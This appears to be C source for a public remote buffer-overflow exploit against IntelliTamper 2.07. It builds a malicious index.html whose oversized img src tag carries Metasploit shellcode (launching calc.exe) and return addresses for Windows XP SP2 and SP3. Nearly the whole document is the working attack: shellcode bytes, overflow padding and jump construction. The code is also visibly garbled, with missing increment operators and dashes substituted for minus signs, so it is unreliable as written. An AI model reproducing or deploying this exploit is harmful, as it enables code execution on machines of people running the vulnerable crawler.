/*
* IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit
*
* Discovered & Written by r0ut3r (writ3r [at] gmail.com)
* Many Thanks to Luigi Auriemma (http://aluigi.org)
*
* Greets to shinnai (http://www.shinnai.net)
* and Guido Landi
*
* IntelliTamper contains a remote buffer overflow vulnerability.
* The HTML parser, more precise the image tag fails to preform
* boundary checks on supplied data.
*
* kit:/home/r0ut3r/public_html/imgsrc-xpl # gcc -o yahh yahh.c
* kit:/home/r0ut3r/public_html/imgsrc-xpl # ./yahh 0
* [!] OS: Microsoft Windows XP Pro SP 2
* [ ] Building payload
* [ ] Inserting JMP code
* [ ] Success writing to index.html
* kit:/home/r0ut3r/public_html/imgsrc-xpl #
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* win32_exec – EXITFUNC=thread CMD=c:\\windows\\system32\\calc.exe Size=184
Encoder=PexFnstenvSub http://metasploit.com
Filtered characters: 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e */
unsigned char shellcode[] =
"\\x31\\xc9\\x83\\xe9\\xd8\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x99"
"\\xeb\\x8d\\x6a\\x83\\xeb\\xfc\\xe2\\xf4\\x65\\x03\\xc9\\x6a\\x99\\xeb\\x06\\x2f"
"\\xa5\\x60\\xf1\\x6f\\xe1\\xea\\x62\\xe1\\xd6\\xf3\\x06\\x35\\xb9\\xea\\x66\\x23"
"\\x12\\xdf\\x06\\x6b\\x77\\xda\\x4d\\xf3\\x35\\x6f\\x4d\\x1e\\x9e\\x2a\\x47\\x67"
"\\x98\\x29\\x66\\x9e\\xa2\\xbf\\xa9\\x6e\\xec\\x0e\\x06\\x35\\xbd\\xea\\x66\\x0c"
"\\x12\\xe7\\xc6\\xe1\\xc6\\xf7\\x8c\\x81\\x12\\xf7\\x06\\x6b\\x72\\x62\\xd1\\x4e"
"\\x9d\\x28\\xbc\\xaa\\xfd\\x60\\xcd\\x5a\\x1c\\x2b\\xf5\\x66\\x12\\xab\\x81\\xe1"
"\\xe9\\xf7\\x20\\xe1\\xf1\\xe3\\x66\\x63\\x12\\x6b\\x3d\\x6a\\x99\\xeb\\x06\\x02"
"\\xa5\\xb4\\xbc\\x9c\\xf9\\xbd\\x04\\x92\\x1a\\x2b\\xf6\\x3a\\xf1\\x04\\x43\\x8a"
"\\xf9\\x83\\x15\\x94\\x13\\xe5\\xda\\x95\\x7e\\x88\\xb7\\x36\\xee\\x82\\xe3\\x0e"
"\\xf6\\x9c\\xfe\\x36\\xea\\x92\\xfe\\x1e\\xfc\\x86\\xbe\\x58\\xc5\\x88\\xec\\x06"
"\\xfa\\xc5\\xe8\\x12\\xfc\\xeb\\x8d\\x6a";
#define JMP 0xe9 //JMP
int main(int argc, char* argv[])
{
FILE *fd;
unsigned char buff[4000],
*jmpref,
*p;
int opt;
struct
{
char *os;
unsigned int eip;
} targets[] =
{
"Microsoft Windows XP Pro SP 2",
0x7d040e1f,
"Microsoft Windows XP Pro SP 3",
0x7c8369f0
};
if (argc < 2)
{
printf("———————————————————\\n");
printf(" IntelliTamper 2.07 Remote Buffer Overflow Expoit \\n\\n");
printf(" Discovered & Written by r0ut3r (writ3r [at] gmail.com)\\n");
printf(" Thanks to Luigi Auriemma (http://aluigi.org)\\n\\n");
printf(" Usage: %s <OS-type>\\n", argv[0]);
printf(" 0: Microsoft Windows XP Pro SP2\\n");
printf(" 1: Microsoft Windows XP Pro SP3\\n");
printf("———————————————————\\n");
return 1;
}
p = buff;
switch (atoi(argv[1]))
{
case 0:
opt = 0;
printf("[!] OS: %s\\n", targets[0].os);
break;
case 1:
opt = 1;
printf("[!] OS: %s\\n", targets[1].os);
break;
}
printf("[ ] Building payload\\n");
p = sprintf(p, "<img src=\\"http://");
jmpref = p;
p = sprintf(p, "%s", shellcode);
int i;
int a = 3065 – (p – jmpref);
for (i=0; i < a; i )
*p = \’A\’;
*(unsigned int *) p = targets[opt].eip;
p = 4;
printf("[ ] Inserting JMP code\\n");
*p = JMP;
*(unsigned int *) p = jmpref – (p 4); //JMP -(3065 4 5)
p = 4;
p = sprintf(p, "\\">");
fd = fopen("index.html", "wb");
if (fd == NULL)
{
perror("[-] Failed opening index.html\\n");
return 1;
}
fwrite(buff, 1, p – buff, fd);
if (fclose(fd) == 0)
printf("[ ] Success writing to index.html\\n");
else
printf("[-] Failed writing to index.html\\n");
return 0;
}